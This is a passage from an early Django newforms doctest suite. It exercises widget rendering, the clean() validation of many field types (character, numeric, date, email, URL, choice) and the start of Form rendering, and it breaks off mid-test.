>>> w.render('name', ['john', 'lennon'])
u'<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />'
>>> w.render('name', 'john__lennon')
u'<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />'
>>> w.render('name', 'john__lennon', attrs={'id':'foo'})
u'<input id="foo_0" type="text" class="big" value="john" name="name_0" /><br /><input id="foo_1" type="text" class="small" value="lennon" name="name_1" />'
>>> w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})), attrs={'id': 'bar'})
>>> w.render('name', ['john', 'lennon'])
u'<input id="bar_0" type="text" class="big" value="john" name="name_0" /><br /><input id="bar_1" type="text" class="small" value="lennon" name="name_1" />'
# SplitDateTimeWidget #########################################################
>>> w = SplitDateTimeWidget()
>>> w.render('date', '')
u'<input type="text" name="date_0" /><input type="text" name="date_1" />'
>>> w.render('date', None)
u'<input type="text" name="date_0" /><input type="text" name="date_1" />'
>>> w.render('date', datetime.datetime(2006, 1, 10, 7, 30))
u'<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />'
>>> w.render('date', [datetime.date(2006, 1, 10), datetime.time(7, 30)])
u'<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />'
You can also pass 'attrs' to the constructor. In this case, the attrs will be
included on both widgets.
>>> w = SplitDateTimeWidget(attrs={'class': 'pretty'})
>>> w.render('date', datetime.datetime(2006, 1, 10, 7, 30))
u'<input type="text" class="pretty" value="2006-01-10" name="date_0" /><input type="text" class="pretty" value="07:30:00" name="date_1" />'
##########
# Fields #
##########
Each Field class does some sort of validation. Each Field has a clean() method,
which either raises django.newforms.ValidationError or returns the "clean"
data -- usually a Unicode object, but, in some rare cases, a list.
Each Field's __init__() takes at least these parameters:
required -- Boolean that specifies whether the field is required.
True by default.
widget -- A Widget class, or instance of a Widget class, that should be
used for this Field when displaying it. Each Field has a default
Widget that it'll use if you don't specify this. In most cases,
the default widget is TextInput.
label -- A verbose name for this field, for use in displaying this field in
a form. By default, Django will use a "pretty" version of the form
field name, if the Field is part of a Form.
initial -- A value to use in this Field's initial display. This value is
*not* used as a fallback if data isn't given.
Other than that, the Field subclasses have class-specific options for
__init__(). For example, CharField has a max_length option.
# CharField ###################################################################
>>> f = CharField()
>>> f.clean(1)
u'1'
>>> f.clean('hello')
u'hello'
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean([1, 2, 3])
u'[1, 2, 3]'
>>> f = CharField(required=False)
>>> f.clean(1)
u'1'
>>> f.clean('hello')
u'hello'
>>> f.clean(None)
u''
>>> f.clean('')
u''
>>> f.clean([1, 2, 3])
u'[1, 2, 3]'
CharField accepts an optional max_length parameter:
>>> f = CharField(max_length=10, required=False)
>>> f.clean('12345')
u'12345'
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 10 characters.']
CharField accepts an optional min_length parameter:
>>> f = CharField(min_length=10, required=False)
>>> f.clean('')
u''
>>> f.clean('12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters.']
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
u'1234567890a'
>>> f = CharField(min_length=10, required=True)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters.']
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
u'1234567890a'
# IntegerField ################################################################
>>> f = IntegerField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
1
>>> isinstance(f.clean('1'), int)
True
>>> f.clean('23')
23
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean('1 ')
1
>>> f.clean(' 1')
1
>>> f.clean(' 1 ')
1
>>> f.clean('1a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f = IntegerField(required=False)
>>> f.clean('')
>>> repr(f.clean(''))
'None'
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('1')
1
>>> isinstance(f.clean('1'), int)
True
>>> f.clean('23')
23
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean('1 ')
1
>>> f.clean(' 1')
1
>>> f.clean(' 1 ')
1
>>> f.clean('1a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
IntegerField accepts an optional max_value parameter:
>>> f = IntegerField(max_value=10)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
1
>>> f.clean(10)
10
>>> f.clean(11)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 10.']
>>> f.clean('10')
10
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 10.']
IntegerField accepts an optional min_value parameter:
>>> f = IntegerField(min_value=10)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 10.']
>>> f.clean(10)
10
>>> f.clean(11)
11
>>> f.clean('10')
10
>>> f.clean('11')
11
min_value and max_value can be used together:
>>> f = IntegerField(min_value=10, max_value=20)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 10.']
>>> f.clean(10)
10
>>> f.clean(11)
11
>>> f.clean('10')
10
>>> f.clean('11')
11
>>> f.clean(20)
20
>>> f.clean(21)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 20.']
# FloatField ##################################################################
>>> f = FloatField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
1.0
>>> isinstance(f.clean('1'), float)
True
>>> f.clean('23')
23.0
>>> f.clean('3.14')
3.1400000000000001
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('1.0 ')
1.0
>>> f.clean(' 1.0')
1.0
>>> f.clean(' 1.0 ')
1.0
>>> f.clean('1.0a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f = FloatField(required=False)
>>> f.clean('')
>>> f.clean(None)
>>> f.clean('1')
1.0
FloatField accepts min_value and max_value just like IntegerField:
>>> f = FloatField(max_value=1.5, min_value=0.5)
>>> f.clean('1.6')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 1.5.']
>>> f.clean('0.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 0.5.']
>>> f.clean('1.5')
1.5
>>> f.clean('0.5')
0.5
# DecimalField ################################################################
>>> f = DecimalField(max_digits=4, decimal_places=2)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
Decimal("1")
>>> isinstance(f.clean('1'), Decimal)
True
>>> f.clean('23')
Decimal("23")
>>> f.clean('3.14')
Decimal("3.14")
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('1.0 ')
Decimal("1.0")
>>> f.clean(' 1.0')
Decimal("1.0")
>>> f.clean(' 1.0 ')
Decimal("1.0")
>>> f.clean('1.0a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('123.45')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 4 digits in total.']
>>> f.clean('1.234')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 decimal places.']
>>> f.clean('123.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 digits before the decimal point.']
>>> f = DecimalField(max_digits=4, decimal_places=2, required=False)
>>> f.clean('')
>>> f.clean(None)
>>> f.clean('1')
Decimal("1")
DecimalField accepts min_value and max_value just like IntegerField:
>>> f = DecimalField(max_digits=4, decimal_places=2, max_value=Decimal('1.5'), min_value=Decimal('0.5'))
>>> f.clean('1.6')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 1.5.']
>>> f.clean('0.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 0.5.']
>>> f.clean('1.5')
Decimal("1.5")
>>> f.clean('0.5')
Decimal("0.5")
# DateField ###################################################################
>>> import datetime
>>> f = DateField()
>>> f.clean(datetime.date(2006, 10, 25))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
datetime.date(2006, 10, 25)
>>> f.clean('2006-10-25')
datetime.date(2006, 10, 25)
>>> f.clean('10/25/2006')
datetime.date(2006, 10, 25)
>>> f.clean('10/25/06')
datetime.date(2006, 10, 25)
>>> f.clean('Oct 25 2006')
datetime.date(2006, 10, 25)
>>> f.clean('October 25 2006')
datetime.date(2006, 10, 25)
>>> f.clean('October 25, 2006')
datetime.date(2006, 10, 25)
>>> f.clean('25 October 2006')
datetime.date(2006, 10, 25)
>>> f.clean('25 October, 2006')
datetime.date(2006, 10, 25)
>>> f.clean('2006-4-31')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('200a-10-25')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('25/10/06')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f = DateField(required=False)
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('')
>>> repr(f.clean(''))
'None'
DateField accepts an optional input_formats parameter:
>>> f = DateField(input_formats=['%Y %m %d'])
>>> f.clean(datetime.date(2006, 10, 25))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.date(2006, 10, 25)
>>> f.clean('2006 10 25')
datetime.date(2006, 10, 25)
The input_formats parameter overrides all default input formats,
so the default formats won't work unless you specify them:
>>> f.clean('2006-10-25')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('10/25/2006')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('10/25/06')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
# TimeField ###################################################################
>>> import datetime
>>> f = TimeField()
>>> f.clean(datetime.time(14, 25))
datetime.time(14, 25)
>>> f.clean(datetime.time(14, 25, 59))
datetime.time(14, 25, 59)
>>> f.clean('14:25')
datetime.time(14, 25)
>>> f.clean('14:25:59')
datetime.time(14, 25, 59)
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
>>> f.clean('1:24 p.m.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
TimeField accepts an optional input_formats parameter:
>>> f = TimeField(input_formats=['%I:%M %p'])
>>> f.clean(datetime.time(14, 25))
datetime.time(14, 25)
>>> f.clean(datetime.time(14, 25, 59))
datetime.time(14, 25, 59)
>>> f.clean('4:25 AM')
datetime.time(4, 25)
>>> f.clean('4:25 PM')
datetime.time(16, 25)
The input_formats parameter overrides all default input formats,
so the default formats won't work unless you specify them:
>>> f.clean('14:30:45')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
# DateTimeField ###############################################################
>>> import datetime
>>> f = DateTimeField()
>>> f.clean(datetime.date(2006, 10, 25))
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
datetime.datetime(2006, 10, 25, 14, 30, 59)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
datetime.datetime(2006, 10, 25, 14, 30, 59, 200)
>>> f.clean('2006-10-25 14:30:45')
datetime.datetime(2006, 10, 25, 14, 30, 45)
>>> f.clean('2006-10-25 14:30:00')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('2006-10-25 14:30')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('2006-10-25')
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean('10/25/2006 14:30:45')
datetime.datetime(2006, 10, 25, 14, 30, 45)
>>> f.clean('10/25/2006 14:30:00')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('10/25/2006 14:30')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('10/25/2006')
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean('10/25/06 14:30:45')
datetime.datetime(2006, 10, 25, 14, 30, 45)
>>> f.clean('10/25/06 14:30:00')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('10/25/06 14:30')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('10/25/06')
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date/time.']
>>> f.clean('2006-10-25 4:30 p.m.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date/time.']
DateField accepts an optional input_formats parameter:
>>> f = DateTimeField(input_formats=['%Y %m %d %I:%M %p'])
>>> f.clean(datetime.date(2006, 10, 25))
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
datetime.datetime(2006, 10, 25, 14, 30, 59)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
datetime.datetime(2006, 10, 25, 14, 30, 59, 200)
>>> f.clean('2006 10 25 2:30 PM')
datetime.datetime(2006, 10, 25, 14, 30)
The input_formats parameter overrides all default input formats,
so the default formats won't work unless you specify them:
>>> f.clean('2006-10-25 14:30:45')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date/time.']
>>> f = DateTimeField(required=False)
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('')
>>> repr(f.clean(''))
'None'
# RegexField ##################################################################
>>> f = RegexField('^\d[A-F]\d$')
>>> f.clean('2A2')
u'2A2'
>>> f.clean('3F3')
u'3F3'
>>> f.clean('3G3')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean(' 2A2')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('2A2 ')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f = RegexField('^\d[A-F]\d$', required=False)
>>> f.clean('2A2')
u'2A2'
>>> f.clean('3F3')
u'3F3'
>>> f.clean('3G3')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('')
u''
Alternatively, RegexField can take a compiled regular expression:
>>> f = RegexField(re.compile('^\d[A-F]\d$'))
>>> f.clean('2A2')
u'2A2'
>>> f.clean('3F3')
u'3F3'
>>> f.clean('3G3')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean(' 2A2')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('2A2 ')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
RegexField takes an optional error_message argument:
>>> f = RegexField('^\d\d\d\d$', error_message='Enter a four-digit number.')
>>> f.clean('1234')
u'1234'
>>> f.clean('123')
Traceback (most recent call last):
...
ValidationError: [u'Enter a four-digit number.']
>>> f.clean('abcd')
Traceback (most recent call last):
...
ValidationError: [u'Enter a four-digit number.']
RegexField also access min_length and max_length parameters, for convenience.
>>> f = RegexField('^\d+$', min_length=5, max_length=10)
>>> f.clean('123')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 5 characters.']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 5 characters.']
>>> f.clean('12345')
u'12345'
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('12345678901')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 10 characters.']
>>> f.clean('12345a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
# EmailField ##################################################################
>>> f = EmailField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('person@example.com')
u'person@example.com'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('foo@')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('foo@bar')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f = EmailField(required=False)
>>> f.clean('')
u''
>>> f.clean(None)
u''
>>> f.clean('person@example.com')
u'person@example.com'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('foo@')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('foo@bar')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
EmailField also access min_length and max_length parameters, for convenience.
>>> f = EmailField(min_length=10, max_length=15)
>>> f.clean('a@foo.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters.']
>>> f.clean('alf@foo.com')
u'alf@foo.com'
>>> f.clean('alf123456788@foo.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 15 characters.']
# URLField ##################################################################
>>> f = URLField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('http://example.com')
u'http://example.com'
>>> f.clean('http://www.example.com')
u'http://www.example.com'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('example.com')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://example')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://example.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://.com')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f = URLField(required=False)
>>> f.clean('')
u''
>>> f.clean(None)
u''
>>> f.clean('http://example.com')
u'http://example.com'
>>> f.clean('http://www.example.com')
u'http://www.example.com'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('example.com')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://example')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://example.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://.com')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
URLField takes an optional verify_exists parameter, which is False by default.
This verifies that the URL is live on the Internet and doesn't return a 404 or 500:
>>> f = URLField(verify_exists=True)
>>> f.clean('http://www.google.com') # This will fail if there's no Internet connection
u'http://www.google.com'
>>> f.clean('http://example')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://www.jfoiwjfoi23jfoijoaijfoiwjofiwjefewl.com') # bad domain
Traceback (most recent call last):
...
ValidationError: [u'This URL appears to be a broken link.']
>>> f.clean('http://google.com/we-love-microsoft.html') # good domain, bad page
Traceback (most recent call last):
...
ValidationError: [u'This URL appears to be a broken link.']
>>> f = URLField(verify_exists=True, required=False)
>>> f.clean('')
u''
>>> f.clean('http://www.google.com') # This will fail if there's no Internet connection
u'http://www.google.com'
URLField also access min_length and max_length parameters, for convenience.
>>> f = URLField(min_length=15, max_length=20)
>>> f.clean('http://f.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 15 characters.']
>>> f.clean('http://example.com')
u'http://example.com'
>>> f.clean('http://abcdefghijklmnopqrstuvwxyz.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 20 characters.']
# BooleanField ################################################################
>>> f = BooleanField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(True)
True
>>> f.clean(False)
False
>>> f.clean(1)
True
>>> f.clean(0)
False
>>> f.clean('Django rocks')
True
>>> f = BooleanField(required=False)
>>> f.clean('')
False
>>> f.clean(None)
False
>>> f.clean(True)
True
>>> f.clean(False)
False
>>> f.clean(1)
True
>>> f.clean(0)
False
>>> f.clean('Django rocks')
True
# ChoiceField #################################################################
>>> f = ChoiceField(choices=[('1', '1'), ('2', '2')])
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
u'1'
>>> f.clean('1')
u'1'
>>> f.clean('3')
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. That choice is not one of the available choices.']
>>> f = ChoiceField(choices=[('1', '1'), ('2', '2')], required=False)
>>> f.clean('')
u''
>>> f.clean(None)
u''
>>> f.clean(1)
u'1'
>>> f.clean('1')
u'1'
>>> f.clean('3')
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. That choice is not one of the available choices.']
>>> f = ChoiceField(choices=[('J', 'John'), ('P', 'Paul')])
>>> f.clean('J')
u'J'
>>> f.clean('John')
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. That choice is not one of the available choices.']
# NullBooleanField ############################################################
>>> f = NullBooleanField()
>>> f.clean('')
>>> f.clean(True)
True
>>> f.clean(False)
False
>>> f.clean(None)
>>> f.clean('1')
>>> f.clean('2')
>>> f.clean('3')
>>> f.clean('hello')
# MultipleChoiceField #########################################################
>>> f = MultipleChoiceField(choices=[('1', '1'), ('2', '2')])
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean([1])
[u'1']
>>> f.clean(['1'])
[u'1']
>>> f.clean(['1', '2'])
[u'1', u'2']
>>> f.clean([1, '2'])
[u'1', u'2']
>>> f.clean((1, '2'))
[u'1', u'2']
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a list of values.']
>>> f.clean([])
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(())
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(['3'])
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. 3 is not one of the available choices.']
>>> f = MultipleChoiceField(choices=[('1', '1'), ('2', '2')], required=False)
>>> f.clean('')
[]
>>> f.clean(None)
[]
>>> f.clean([1])
[u'1']
>>> f.clean(['1'])
[u'1']
>>> f.clean(['1', '2'])
[u'1', u'2']
>>> f.clean([1, '2'])
[u'1', u'2']
>>> f.clean((1, '2'))
[u'1', u'2']
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a list of values.']
>>> f.clean([])
[]
>>> f.clean(())
[]
>>> f.clean(['3'])
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. 3 is not one of the available choices.']
# ComboField ##################################################################
ComboField takes a list of fields that should be used to validate a value,
in that order.
>>> f = ComboField(fields=[CharField(max_length=20), EmailField()])
>>> f.clean('test@example.com')
u'test@example.com'
>>> f.clean('longemailaddress@example.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 20 characters.']
>>> f.clean('not an e-mail')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f = ComboField(fields=[CharField(max_length=20), EmailField()], required=False)
>>> f.clean('test@example.com')
u'test@example.com'
>>> f.clean('longemailaddress@example.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 20 characters.']
>>> f.clean('not an e-mail')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('')
u''
>>> f.clean(None)
u''
# SplitDateTimeField ##########################################################
>>> f = SplitDateTimeField()
>>> f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)])
datetime.datetime(2006, 1, 10, 7, 30)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a list of values.']
>>> f.clean(['hello', 'there'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.', u'Enter a valid time.']
>>> f.clean(['2006-01-10', 'there'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
>>> f.clean(['hello', '07:30'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f = SplitDateTimeField(required=False)
>>> f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)])
datetime.datetime(2006, 1, 10, 7, 30)
>>> f.clean(None)
>>> f.clean('')
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a list of values.']
>>> f.clean(['hello', 'there'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.', u'Enter a valid time.']
>>> f.clean(['2006-01-10', 'there'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
>>> f.clean(['hello', '07:30'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
#########
# Forms #
#########
A Form is a collection of Fields. It knows how to validate a set of data and it
knows how to render itself in a couple of default ways (e.g., an HTML table).
You can pass it data in __init__(), as a dictionary.
# Form ########################################################################
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
Pass a dictionary to a Form's __init__().
>>> p = Person({'first_name': u'John', 'last_name': u'Lennon', 'birthday': u'1940-10-9'})
>>> p.is_bound
True
>>> p.errors
{}
>>> p.is_valid()
True
>>> p.errors.as_ul()
u''
>>> p.errors.as_text()
u''
>>> p.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
>>> print p['first_name']
<input type="text" name="first_name" value="John" id="id_first_name" />
>>> print p['last_name']
<input type="text" name="last_name" value="Lennon" id="id_last_name" />
>>> print p['birthday']
<input type="text" name="birthday" value="1940-10-9" id="id_birthday" />
>>> print p['nonexistentfield']
Traceback (most recent call last):
...
KeyError: "Key 'nonexistentfield' not found in Form"
>>> for boundfield in p:
... print boundfield
<input type="text" name="first_name" value="John" id="id_first_name" />
<input type="text" name="last_name" value="Lennon" id="id_last_name" />
<input type="text" name="birthday" value="1940-10-9" id="id_birthday" />
>>> for boundfield in p:
... print boundfield.label, boundfield.data
First name John
Last name Lennon
Birthday 1940-10-9
>>> print p
<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" value="John" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" value="Lennon" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" value="1940-10-9" id="id_birthday" /></td></tr>
Empty dictionaries are valid, too.
>>> p = Person({})
>>> p.is_bound
True
>>> p.errors
{'first_name': [u'This field is required.'], 'last_name': [u'This field is required.'], 'birthday': [u'This field is required.']}
>>> p.is_valid()
False
>>> p.cleaned_data
Traceback (most recent call last):
...
AttributeError: 'Person' object has no attribute 'cleaned_data'
>>> print p
<tr><th><label for="id_first_name">First name:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="birthday" id="id_birthday" /></td></tr>
>>> print p.as_table()
<tr><th><label for="id_first_name">First name:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="birthday" id="id_birthday" /></td></tr>
>>> print p.as_ul()
